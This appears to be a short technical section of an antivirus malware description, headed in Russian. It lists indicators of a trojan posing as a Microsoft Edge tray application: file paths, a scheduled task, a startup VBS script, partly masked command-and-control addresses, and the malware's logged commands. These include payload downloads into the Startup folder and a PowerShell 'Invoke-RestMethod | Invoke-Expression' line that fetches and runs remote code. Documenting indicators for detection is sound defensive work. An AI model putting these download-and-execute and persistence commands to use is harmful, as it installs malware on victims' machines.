Техническая информация
- <SYSTEM32>\tasks\microsoft\windows\microsoftedge trayapp
- %TEMP%\microsoftedgeget.exe
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\2.txt
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\edge.dat.log1
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\ssasr.dll
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\trayapp.exe
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\trayapp.vbs
- '38.##6.248.140':80
- '43.##2.225.33':443
- http://38.##6.248.140/0831/43.152.225.33/windows-get.exe
- http://38.##6.248.140/0831/43.152.225.33/TrayApp.exe
- http://38.##6.248.140/0831/43.152.225.33/TrayApp.vbs
- '43.##2.225.33':443
- '%TEMP%\microsoftedgeget.exe' -nc -i http://38.##6.248.140/0831/43.##2.225.33/2.txt -P "%ProgramFiles(x86)%\Microsoft\Edge\Microsoft TrayApp"
- '%TEMP%\microsoftedgeget.exe' -nc http://38.##6.248.140/0831/43.##2.225.33/TrayApp.vbs -P "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup"
- '%ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\trayapp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'http://38.##6.248.140/0831/43.##2.225.33/1.txt' | Invoke-Expression"